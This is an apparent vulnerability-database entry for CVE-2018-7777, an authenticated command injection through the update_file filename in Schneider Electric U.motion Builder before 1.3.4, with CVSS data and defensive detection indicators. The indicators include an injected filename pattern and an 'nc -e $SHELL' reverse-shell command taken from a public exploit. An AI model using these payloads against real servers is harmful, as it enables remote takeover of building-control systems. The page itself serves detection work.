cbcvebase.
CVE-2018-7777
published 2018-07-03

CVE-2018-7777: The vulnerability is due to insufficient handling of update_file request parameter on update_module.php in Schneider Electric U.motion Builder software…

PriorityP272high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
31.80%
98.1th percentile
The vulnerability is due to insufficient handling of update_file request parameter on update_module.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server.

Affected

2 ranges
VendorProductVersion rangeFixed in
schneider-electricu.motion_builder< 1.3.41.3.4
schneider_electric_seu.motion

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://{target}:{port}/umotion/modules/system/update_module.php
path/umotion/modules/system/update_module.php
cookiePHPSESSID={sessid}; loginSeed={login_seed}
filenamemy;{command};file.tar.gz
commandnc -e $SHELL {src_ip} 4444
port4444
bytes
\x1f\x8b
  • Detect POST requests to /umotion/modules/system/update_module.php where the multipart filename field (update_file) contains semicolons, indicating command injection via the filename parameter.
  • Look for the multipart boundary string '----------lImIt_of_THE_fIle_eW_$' in HTTP request bodies, which is a static indicator used by the public exploit.
  • Monitor for the X-Requested-With: XMLHttpRequest header combined with a POST to update_module.php and a multipart/form-data body containing 'choose_update_mode=MANUAL' and 'step=2'.
  • Alert on HTTP requests to /umotion/modules/system/externalframe.php used as the Referer header alongside exploitation of update_module.php.
  • Detect reverse shell attempts originating from the U.Motion server process on port 4444, consistent with 'nc -e $SHELL' payload delivery.
  • The exploit regex pattern for cookie extraction is 'PHPSESSID=(.{26});.*loginSeed=(.{32})' — monitor for both cookies being set simultaneously as a login indicator before exploitation.
  • ·The vulnerability requires authentication; the attacker must first obtain valid credentials and log in via user_login.php before exploiting update_module.php.
  • ·The exploit targets versions prior to v1.3.4; the exploit title references 1.3.4 but the NVD description clarifies the vulnerable range is versions *prior to* v1.3.4.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.